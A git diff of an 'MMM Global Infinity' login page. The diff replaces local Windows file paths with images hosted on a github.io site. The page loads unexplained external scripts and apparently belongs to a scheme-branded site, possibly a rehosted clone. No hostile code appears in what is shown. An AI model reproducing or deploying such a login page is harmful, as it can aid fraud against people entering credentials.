--- a/index.html
+++ b/index.html
@@ -1,13 +1,13 @@
 <html><script src="chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js"></script><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
-<link type="image/x-icon" href="file:///C:/Users/Administrator/Documents/24082022/MMM%20NEW/favicon.ico" rel="icon">
-<link type="image/x-icon" href="file:///C:/Users/Administrator/Documents/24082022/MMM%20NEW/favicon.ico" rel="shortcut icon">
+<link type="image/x-icon" href="https://mmm-globalinfinity.github.io/login/image/favicon.ico" rel="icon">
+<link type="image/x-icon" href="https://mmm-globalinfinity.github.io/login/image/favicon.ico" rel="shortcut icon">
 <title>MMM Global Infinity - Login</title>
 <script type="text/javascript" src="https://mmmofice.com/ajax.js"></script>
 <style type="text/css">
 html,body{
-background: url("file:///C:/Users/Administrator/Documents/24082022/MMM%20NEW/1909462.png");
+background: url("https://mmm-globalinfinity.github.io/login/image/1909462.png");
 background-size: cover !important;
 background-repeat: no-repeat !important;
 background-position: center center !important;
@@ -81,7 +81,7 @@ input[type="password"]:focus { outline: none; }
 }
 
 .input_text3{background:#ccc;border:0;font-size:13px;padding:3px 7px;color:#666;border-radius:3px;-webkit-border-radius:3px;-moz-border-radius:3px;-khtml-border-radius:3px;width:197px;}
-h1{background:url('file:///C:/Users/Administrator/Documents/24082022/MMM%20NEW/logo.gif') 42px top no-repeat;height:40px;line-height:40px;font-size:18px;padding:0 0 10px 115px; margin:0; float:left; font-family:Verdana,"Geneva CY","DejaVu Sans",sans-serif; font-weight:400}
+h1{background:url('https://mmm-globalinfinity.github.io/login/image/logo.gif') 42px top no-repeat;height:40px;line-height:40px;font-size:18px;padding:0 0 10px 115px; margin:0; float:left; font-family:Verdana,"Geneva CY","DejaVu Sans",sans-serif; font-weight:400}
 .lf_head{background:url('img/logo.gif') 42px top no-repeat;height:40px;line-height:40px;font-size:20px;padding:0 0 10px 115px;}.lf_head .lang{float:right;margin:5px 20px 0 0;}.lf_head div{float:left;}
 .lf_line{padding:0 0 5px 0;}.lf_line p{text-align:center;margin-top:20px;font-size:12px;color:#777;}.lf_line label{float:left;width:105px;text-align:right;font-size:12px;margin:0 10px 0 0;line-height:21px;}.lf_line button{margin:0 0 0 145px;outline:none;box-shadow:1px 1px 1px #946d3f;}.lf_line .lf_line_italic{font-size:11px;font-style:italic;color:#777;margin:5px 25px 5px 115px;text-align:left;line-height:12px;}.lf_line .lf_line_italic a{margin:0 0 5px 0;display:block;}.lf_line select{background:#ccc;border:1px solid #ccc;border-radius:4px;color:#666;font-size:14px;padding:1px;width:194px;}.lf_line select option{color:#666;}
 .button_orange,.button_green,.button_green2,.button_pink{border:0;background:#000;color:#fff;font-size:12px;border-radius:4px;-webkit-border-radius:4px;-moz-border-radius:4px;-khtml-border-radius:4px;padding:5px 20px;cursor:pointer;}.button_orange{background:darkorange;}.button_green{background:#7DC55A;}.button_green2{background:#7DC55A;}.button_pink{background:#FF7362;position:absolute;top:144px;left:140px;}
@@ -272,7 +272,7 @@ $(document).ready(function() {
 <iframe id="rFrame" name="rFrame" style="display: none"></iframe>
 	<div id="container">
 		<!-- <center><img style="margin-bottom:5px; cursor:pointer" src="img/mmm2.png" onclick="document.location='http://mmmgi.com'"  /></center> -->
-				<center><a href=""><img style="margin-bottom:5px;" src="file:///C:/Users/Administrator/Documents/24082022/MMM%20NEW/mmm2.png" border="0" title="Official home page" alt="Join MMM Global Infinity">
+				<center><a href=""><img style="margin-bottom:5px;" src="https://mmm-globalinfinity.github.io/login/image/mmm2.png" border="0" title="Official home page" alt="Join MMM Global Infinity">
 				<img style="margin-bottom:5px; display:none;" src="img/mmm2.png" border="0" title="官方頁面站點" alt="Join MMM Global Infinity"></a></center>
 				<div class="form_wrap">
 							<h1>Login to MMM system</h1>
